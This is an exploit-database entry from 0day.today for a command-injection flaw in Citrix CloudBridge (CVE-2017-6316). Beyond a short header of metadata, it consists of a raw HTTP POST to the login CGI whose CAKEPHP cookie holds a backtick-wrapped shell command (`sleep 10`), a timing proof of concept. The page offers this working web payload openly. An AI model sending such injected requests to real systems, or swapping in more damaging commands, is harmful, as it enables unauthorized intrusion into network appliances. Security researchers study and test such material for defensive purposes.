[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Citrix CloudBridge - CAKEPHP Cookie Command Injection Vulnerability

Author
xort
Risk
[
Security Risk High
]
0day-ID
0day-ID-28158
Category
web applications
Date add
20-07-2017
CVE
CVE-2017-6316
Platform
cgi
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
 
action=logout

#  0day.today [2024-11-15]  #